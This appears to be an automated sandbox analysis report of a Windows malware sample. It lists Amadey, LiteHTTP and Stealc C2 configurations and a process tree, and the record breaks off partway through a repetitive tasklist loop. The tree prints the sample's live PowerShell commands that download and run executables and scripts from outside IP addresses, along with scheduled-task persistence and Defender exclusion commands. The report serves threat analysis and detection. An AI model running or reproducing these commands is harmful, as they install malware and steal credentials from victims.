Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05/03/2025, 21:29

General

  • Target

    f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe

  • Size

    938KB

  • MD5

    865b70535cac91a7fb0a5e7453798edc

  • SHA1

    bf3e1c9613ef801ad1ff939717bce851cc555282

  • SHA256

    f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c

  • SHA512

    73bf144459c82e83a2cd039d9ca2002268bc8df2aa19ff80fc5d0feb722c8dd38974daad5b8d9a9069d9cf5bb9220582cce1e8fc907f3090677ff2bbd4149138

  • SSDEEP

    24576:AqDEvCTbMWu7rQYlBQcBiT6rprG8a0Xu:ATvC/MTQYxsWR7a0X

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 11 IoCs
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 19 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 44 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 32 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 44 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 33 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 54 IoCs
  • Suspicious use of FindShellTrayWindow 21 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe
    "C:\Users\Admin\AppData\Local\Temp\f77181c378ba4bd9a7c5a8bf5f4c2c159af00fd81493d740c4c0d405b1902a7c.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2328
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn LbktqmaHN2A /tr "mshta C:\Users\Admin\AppData\Local\Temp\HzIVJTpkb.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2212
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn LbktqmaHN2A /tr "mshta C:\Users\Admin\AppData\Local\Temp\HzIVJTpkb.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2084
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\HzIVJTpkb.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2220
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1100
        • C:\Users\Admin\AppData\Local\TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE
          "C:\Users\Admin\AppData\Local\TempJICSAQQTO1AS3W9KG6TJQRLWTFDJOXXR.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2852
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2144
            • C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
              "C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"
              6⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1616
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\pDcYrl4C\Anubis.exe""
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2724
            • C:\Users\Admin\AppData\Local\Temp\10106670101\68271cbb99.exe
              "C:\Users\Admin\AppData\Local\Temp\10106670101\68271cbb99.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:848
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn F0EW1macdZW /tr "mshta C:\Users\Admin\AppData\Local\Temp\Rr9g4HhLm.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1096
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn F0EW1macdZW /tr "mshta C:\Users\Admin\AppData\Local\Temp\Rr9g4HhLm.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:840
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\Rr9g4HhLm.hta
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2608
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2156
                  • C:\Users\Admin\AppData\Local\TempZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE
                    "C:\Users\Admin\AppData\Local\TempZCF5TUPWYXNMBBTBGT0A7S5I6NNLTUKI.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1464
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\10106680121\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:268
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:2016
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1604
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  PID:2520
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2420
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2392
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2468
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2228
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "fFWMJmaUaQB" /tr "mshta \"C:\Temp\dGUhPFzXc.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:2812
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\dGUhPFzXc.hta"
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                PID:2888
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3008
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1532
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10106761121\PcAIvJ0.cmd"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2800
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1976
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1740
            • C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
              "C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1524
              • C:\Users\Admin\AppData\Local\Temp\dll32.exe
                "C:\Users\Admin\AppData\Local\Temp\dll32.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1564
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp88B0.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp88B0.tmp.bat
                  8⤵
                    PID:2460
                    • C:\Windows\system32\chcp.com
                      chcp 65001
                      9⤵
                        PID:2228
                      • C:\Windows\system32\tasklist.exe
                        Tasklist /fi "PID eq 1564"
                        9⤵
                        • Enumerates processes with tasklist
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2092
                      • C:\Windows\system32\find.exe
                        find ":"
                        9⤵
                          PID:2236
                        • C:\Windows\system32\timeout.exe
                          Timeout /T 1 /Nobreak
                          9⤵
                          • Delays execution with timeout.exe
                          PID:1240
                        • C:\Windows\system32\tasklist.exe
                          Tasklist /fi "PID eq 1564"
                          9⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2688
                        • C:\Windows\system32\find.exe
                          find ":"
                          9⤵
                            PID:2976
                          • C:\Windows\system32\timeout.exe
                            Timeout /T 1 /Nobreak
                            9⤵
                            • Delays execution with timeout.exe
                            PID:2852
                          • C:\Windows\system32\tasklist.exe
                            Tasklist /fi "PID eq 1564"
                            9⤵
                            • Enumerates processes with tasklist
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1176
                          • C:\Windows\system32\find.exe
                            find ":"
                            9⤵
                              PID:2776
                            • C:\Windows\system32\timeout.exe
                              Timeout /T 1 /Nobreak
                              9⤵
                              • Delays execution with timeout.exe
                              PID:2404
                            • C:\Windows\system32\tasklist.exe
                              Tasklist /fi "PID eq 1564"
                              9⤵
                              • Enumerates processes with tasklist
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2676
                            • C:\Windows\system32\find.exe
                              find ":"
                              9⤵
                                PID:1148
                              • C:\Windows\system32\timeout.exe
                                Timeout /T 1 /Nobreak
                                9⤵
                                • Delays execution with timeout.exe
                                PID:1404
                              • C:\Windows\system32\tasklist.exe
                                Tasklist /fi "PID eq 1564"
                                9⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1996
                              • C:\Windows\system32\find.exe
                                find ":"
                                9⤵
                                  PID:2208
                                • C:\Windows\system32\timeout.exe
                                  Timeout /T 1 /Nobreak
                                  9⤵
                                  • Delays execution with timeout.exe
                                  PID:2524
                                • C:\Windows\system32\tasklist.exe
                                  Tasklist /fi "PID eq 1564"
                                  9⤵
                                  • Enumerates processes with tasklist
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2120
                                • C:\Windows\system32\find.exe
                                  find ":"
                                  9⤵
                                    PID:920
                                  • C:\Windows\system32\timeout.exe
                                    Timeout /T 1 /Nobreak
                                    9⤵
                                    • Delays execution with timeout.exe
                                    PID:2568
                                  • C:\Windows\system32\tasklist.exe
                                    Tasklist /fi "PID eq 1564"
                                    9⤵
                                    • Enumerates processes with tasklist
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1660
                                  • C:\Windows\system32\find.exe
                                    find ":"
                                    9⤵
                                      PID:2032
                                    • C:\Windows\system32\timeout.exe
                                      Timeout /T 1 /Nobreak
                                      9⤵
                                      • Delays execution with timeout.exe
                                      PID:2592
                                    • C:\Windows\system32\tasklist.exe
                                      Tasklist /fi "PID eq 1564"
                                      9⤵
                                      • Enumerates processes with tasklist
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2392
                                    • C:\Windows\system32\find.exe
                                      find ":"
                                      9⤵
                                        PID:1716
                                      • C:\Windows\system32\timeout.exe
                                        Timeout /T 1 /Nobreak
                                        9⤵
                                        • Delays execution with timeout.exe
                                        PID:2260
                                      • C:\Windows\system32\tasklist.exe
                                        Tasklist /fi "PID eq 1564"
                                        9⤵
                                        • Enumerates processes with tasklist
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2268
                                      • C:\Windows\system32\find.exe
                                        find ":"
                                        9⤵
                                          PID:2828
                                        • C:\Windows\system32\timeout.exe
                                          Timeout /T 1 /Nobreak
                                          9⤵
                                          • Delays execution with timeout.exe
                                          PID:3048
                                        • C:\Windows\system32\tasklist.exe
                                          Tasklist /fi "PID eq 1564"
                                          9⤵
                                          • Enumerates processes with tasklist
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2976
                                        • C:\Windows\system32\find.exe
                                          find ":"
                                          9⤵
                                            PID:1860
                                          • C:\Windows\system32\timeout.exe
                                            Timeout /T 1 /Nobreak
                                            9⤵
                                            • Delays execution with timeout.exe
                                            PID:580
                                          • C:\Windows\system32\tasklist.exe
                                            Tasklist /fi "PID eq 1564"
                                            9⤵
                                            • Enumerates processes with tasklist
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1040
                                          • C:\Windows\system32\find.exe
                                            find ":"
                                            9⤵
                                              PID:1780
                                            • C:\Windows\system32\timeout.exe
                                              Timeout /T 1 /Nobreak
                                              9⤵
                                              • Delays execution with timeout.exe
                                              PID:944
                                            • C:\Windows\system32\tasklist.exe
                                              Tasklist /fi "PID eq 1564"
                                              9⤵
                                              • Enumerates processes with tasklist
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2356
                                            • C:\Windows\system32\find.exe
                                              find ":"
                                              9⤵
                                                PID:3052
                                              • C:\Windows\system32\timeout.exe
                                                Timeout /T 1 /Nobreak
                                                9⤵
                                                • Delays execution with timeout.exe
                                                PID:840
                                              • C:\Windows\system32\tasklist.exe
                                                Tasklist /fi "PID eq 1564"
                                                9⤵
                                                • Enumerates processes with tasklist
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1508
                                              • C:\Windows\system32\find.exe
                                                find ":"
                                                9⤵
                                                  PID:2912
                                                • C:\Windows\system32\timeout.exe
                                                  Timeout /T 1 /Nobreak
                                                  9⤵
                                                  • Delays execution with timeout.exe
                                                  PID:880
                                                • C:\Windows\system32\tasklist.exe
                                                  Tasklist /fi "PID eq 1564"
                                                  9⤵
                                                  • Enumerates processes with tasklist
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3008
                                                • C:\Windows\system32\find.exe
                                                  find ":"
                                                  9⤵
                                                    PID:2500
                                                  • C:\Windows\system32\timeout.exe
                                                    Timeout /T 1 /Nobreak
                                                    9⤵
                                                    • Delays execution with timeout.exe
                                                    PID:2192
                                                  • C:\Windows\system32\tasklist.exe
                                                    Tasklist /fi "PID eq 1564"
                                                    9⤵
                                                    • Enumerates processes with tasklist
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1700
                                                  • C:\Windows\system32\find.exe
                                                    find ":"
                                                    9⤵
                                                      PID:836
                                                    • C:\Windows\system32\timeout.exe
                                                      Timeout /T 1 /Nobreak
                                                      9⤵
                                                      • Delays execution with timeout.exe
                                                      PID:2628
                                                    • C:\Windows\system32\tasklist.exe
                                                      Tasklist /fi "PID eq 1564"
                                                      9⤵
                                                      • Enumerates processes with tasklist
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1084
                                                    • C:\Windows\system32\find.exe
                                                      find ":"
                                                      9⤵
                                                        PID:1416
                                                      • C:\Windows\system32\timeout.exe
                                                        Timeout /T 1 /Nobreak
                                                        9⤵
                                                        • Delays execution with timeout.exe
                                                        PID:2060
                                                      • C:\Windows\system32\tasklist.exe
                                                        Tasklist /fi "PID eq 1564"
                                                        9⤵
                                                        • Enumerates processes with tasklist
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2528
                                                      • C:\Windows\system32\find.exe
                                                        find ":"
                                                        9⤵
                                                          PID:2012
                                                        • C:\Windows\system32\timeout.exe
                                                          Timeout /T 1 /Nobreak
                                                          9⤵
                                                          • Delays execution with timeout.exe
                                                          PID:344
                                                        • C:\Windows\system32\tasklist.exe
                                                          Tasklist /fi "PID eq 1564"
                                                          9⤵
                                                          • Enumerates processes with tasklist
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2468
                                                        • C:\Windows\system32\find.exe
                                                          find ":"
                                                          9⤵
                                                            PID:1716
                                                          • C:\Windows\system32\timeout.exe
                                                            Timeout /T 1 /Nobreak
                                                            9⤵
                                                            • Delays execution with timeout.exe
                                                            PID:1504
                                                          • C:\Windows\system32\tasklist.exe
                                                            Tasklist /fi "PID eq 1564"
                                                            9⤵
                                                            • Enumerates processes with tasklist
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1220
                                                          • C:\Windows\system32\find.exe
                                                            find ":"
                                                            9⤵
                                                              PID:1512
                                                            • C:\Windows\system32\timeout.exe
                                                              Timeout /T 1 /Nobreak
                                                              9⤵
                                                              • Delays execution with timeout.exe
                                                              PID:1236
                                                            • C:\Windows\system32\tasklist.exe
                                                              Tasklist /fi "PID eq 1564"
                                                              9⤵
                                                              • Enumerates processes with tasklist
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2448
                                                            • C:\Windows\system32\find.exe
                                                              find ":"
                                                              9⤵
                                                                PID:380
                                                              • C:\Windows\system32\timeout.exe
                                                                Timeout /T 1 /Nobreak
                                                                9⤵
                                                                • Delays execution with timeout.exe
                                                                PID:2696
                                                              • C:\Windows\system32\tasklist.exe
                                                                Tasklist /fi "PID eq 1564"
                                                                9⤵
                                                                • Enumerates processes with tasklist
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:396
                                                              • C:\Windows\system32\find.exe
                                                                find ":"
                                                                9⤵
                                                                  PID:2384
                                                                • C:\Windows\system32\timeout.exe
                                                                  Timeout /T 1 /Nobreak
                                                                  9⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:840
                                                                • C:\Windows\system32\tasklist.exe
                                                                  Tasklist /fi "PID eq 1564"
                                                                  9⤵
                                                                  • Enumerates processes with tasklist
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3132
                                                                • C:\Windows\system32\find.exe
                                                                  find ":"
                                                                  9⤵
                                                                    PID:3140
                                                                  • C:\Windows\system32\timeout.exe
                                                                    Timeout /T 1 /Nobreak
                                                                    9⤵
                                                                    • Delays execution with timeout.exe
                                                                    PID:3172
                                                                  • C:\Windows\system32\tasklist.exe
                                                                    Tasklist /fi "PID eq 1564"
                                                                    9⤵
                                                                    • Enumerates processes with tasklist
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:3304
                                                                  • C:\Windows\system32\find.exe
                                                                    find ":"
                                                                    9⤵
                                                                      PID:3312
                                                                    • C:\Windows\system32\timeout.exe
                                                                      Timeout /T 1 /Nobreak
                                                                      9⤵
                                                                      • Delays execution with timeout.exe
                                                                      PID:3340
                                                                    • C:\Windows\system32\tasklist.exe
                                                                      Tasklist /fi "PID eq 1564"
                                                                      9⤵
                                                                      • Enumerates processes with tasklist
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3508
                                                                    • C:\Windows\system32\find.exe
                                                                      find ":"
                                                                      9⤵
                                                                        PID:3516
                                                                      • C:\Windows\system32\timeout.exe
                                                                        Timeout /T 1 /Nobreak
                                                                        9⤵
                                                                        • Delays execution with timeout.exe
                                                                        PID:3544
                                                                      • C:\Windows\system32\tasklist.exe
                                                                        Tasklist /fi "PID eq 1564"
                                                                        9⤵
                                                                        • Enumerates processes with tasklist
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:3560
                                                                      • C:\Windows\system32\find.exe
                                                                        find ":"
                                                                        9⤵
                                                                          PID:3568
                                                                        • C:\Windows\system32\timeout.exe
                                                                          Timeout /T 1 /Nobreak
                                                                          9⤵
                                                                          • Delays execution with timeout.exe
                                                                          PID:3596
                                                                        • C:\Windows\system32\tasklist.exe
                                                                          Tasklist /fi "PID eq 1564"
                                                                          9⤵
                                                                          • Enumerates processes with tasklist
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3644
                                                                        • C:\Windows\system32\find.exe
                                                                          find ":"
                                                                          9⤵
                                                                            PID:3652
                                                                          • C:\Windows\system32\timeout.exe
                                                                            Timeout /T 1 /Nobreak
                                                                            9⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:3680
                                                                          • C:\Windows\system32\tasklist.exe
                                                                            Tasklist /fi "PID eq 1564"
                                                                            9⤵
                                                                            • Enumerates processes with tasklist
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:3760
                                                                          • C:\Windows\system32\find.exe
                                                                            find ":"
                                                                            9⤵
                                                                              PID:3768
                                                                            • C:\Windows\system32\timeout.exe
                                                                              Timeout /T 1 /Nobreak
                                                                              9⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:3796
                                                                            • C:\Windows\system32\tasklist.exe
                                                                              Tasklist /fi "PID eq 1564"
                                                                              9⤵
                                                                              • Enumerates processes with tasklist
